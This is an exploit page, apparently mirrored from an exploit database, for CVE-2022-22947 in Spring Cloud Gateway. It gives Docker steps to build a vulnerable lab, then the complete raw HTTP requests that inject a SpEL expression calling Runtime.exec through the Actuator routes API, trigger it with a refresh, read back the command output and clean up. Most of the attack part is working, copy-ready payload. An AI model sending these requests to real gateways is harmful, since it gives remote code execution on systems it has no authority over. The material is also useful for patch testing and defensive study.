Exploit for Expression Language Injection in Vmware Spring Cloud Gateway CVE-2022-22947

Name: Exploit for Expression Language Injection in Vmware Spring Cloud Gateway CVE-2022-22947
Rating: 5 (376 reviews)
2022-04-15 | CVSS 6.8
## https://sploitus.com/exploit?id=159F2FD0-B230-5CB7-B1E6-E7A0ABD62FDE
# Spring Cloud Gateway Actuator API SpEL Code Injection (CVE-2022-22947)
## Build
```bash
$ git clone https://github.com/twseptian/cve-2022-22947.git
$ cd cve-2022-22947
$ docker build . -t cve-2022-22947
$ docker run -p 9000:9000 --name cve-2022-22947 cve-2022-22947
```

![docker_run](screenshots/poc1.png)

![run on browser](screenshots/browser.png)

## PoC
- send the following request to add a router which contains an SpEL expression (in this case, we tried to execute `id`)

```bash
POST /actuator/gateway/routes/test123 HTTP/1.1
Host: 172.17.0.2:9000
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Content-Type: application/json
Content-Length: 340

{
  "id": "test123",
  "filters": [{
    "name": "AddResponseHeader",
    "args": {
      "name": "Result",
      "value": "#{new String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String[]{\"id\"}).getInputStream()))}"
    }
  }],
  "uri": "http://example.com",
"order":0
}
```

![create route test123](screenshots/create.png)

- refresh the gateway to execute the SpEL expression

```bash
POST /actuator/gateway/refresh HTTP/1.1
Host: 172.17.0.2:9000
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
```

![refresh application](screenshots/refresh.png)

- send the request to get `id` information

```bash
GET /actuator/gateway/routes/test123 HTTP/1.1
Host: 172.17.0.2:9000
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 
```

![get/run application](screenshots/get_test123.png)

- `DELETE` request to remove SpEL expression

```bash
DELETE /actuator/gateway/routes/test123 HTTP/1.1
Host: 172.17.0.2:9000
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/x-www-form-urlencoded
```

![delete application](screenshots/del_test123.png)

- refresh the gateway

```bash
POST /actuator/gateway/refresh HTTP/1.1
Host: 172.17.0.2:9000
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
```

![refresh application](screenshots/refresh.png)

## References:
- [CVE-2022-22947: SPEL CASTING AND EVIL BEANS](https://wya.pl/2022/02/26/cve-2022-22947-spel-casting-and-evil-beans/)
- [BRING YOUR OWN SSRF – THE GATEWAY ACTUATOR](https://wya.pl/2021/12/20/bring-your-own-ssrf-the-gateway-actuator/)
- [Spring Cloud Gateway Actuator API SpEL Code Injection (CVE-2022-22947)](https://github.com/vulhub/vulhub/tree/master/spring/CVE-2022-22947)
- [Spring Gateway Demo](https://github.com/wdahlenburg/spring-gateway-demo)